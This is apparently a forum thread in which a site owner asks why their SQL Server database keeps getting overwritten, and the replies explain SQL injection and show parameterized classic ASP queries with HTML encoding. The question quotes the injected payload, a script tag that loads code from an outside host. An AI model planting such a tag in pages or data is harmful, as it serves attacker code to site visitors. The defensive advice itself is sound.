I am having a serious issue with our sql database.
We have SQL Server Express 2005 running on a Windows 2003 Web Edition virtual machine.
We have a classic ASP website that uses this database and runs in the same server.
Our database is being constantly attacked, updating all rows with values like "<script src="http://ecall09edytu.rr.nu/sl.php?v=2"></script>"
I don't know how they are getting access to do this.
I have changed all passwords, limited the access to the server (ftp and remote desktop) to only my personal ip, disabled remote access to sql server...
Anything you can think of will be greatly appreciated.
This looks like a combination of SQL injection and cross-site scripting. The cause of SQL injection is failure to use parameterized queries in application code. If one builds SQL statement strings by concatenating user input, a malicious user can manipulate the SQL statement so that a statement other than the one intended is executed.
Dan Guzman, SQL Server MVP, http://weblogs.sqlteam.com/dang/
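As an added illustration that is not part of the original thread, here is the concatenation pattern the answer describes next to its parameterized form in classic ASP with ADO. The table, column, query-string name and connection string are assumptions for the example.

```asp
<%
' Assumed for this example: a table Products(ProductId int, Name nvarchar(100))
' and a connection string stored in an application variable.
Dim connStr
connStr = Application("ConnString")

Dim productId
productId = Request.QueryString("id")

' VULNERABLE pattern (shown only, never executed here): the query text is built
' by concatenating user input, so whatever arrives in ?id= becomes part of the
' statement the server parses and runs.
Dim sqlBad
sqlBad = "SELECT Name FROM Products WHERE ProductId = " & productId

' HARDENED pattern: validate the input type, then send the value as a typed
' parameter. The SQL text is fixed, so the value can never alter the statement.
If Not IsNumeric(productId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Dim conn, cmd, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open connStr

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT Name FROM Products WHERE ProductId = ?"
cmd.CommandType = 1 ' adCmdText
' adInteger = 3, adParamInput = 1; size is irrelevant for numeric types
cmd.Parameters.Append cmd.CreateParameter("@id", 3, 1, 0, CLng(productId))

Set rs = cmd.Execute

' Encode on output as well: data already poisoned with <script> tags must not
' be rendered raw, or the stored cross-site scripting still fires in browsers.
Do Until rs.EOF
    Response.Write Server.HTMLEncode(rs("Name")) & "<br>"
    rs.MoveNext
Loop

rs.Close
conn.Close
%>
```

Every page that reads request input and builds SQL needs the same change; one remaining concatenated query is enough for the mass update the question describes.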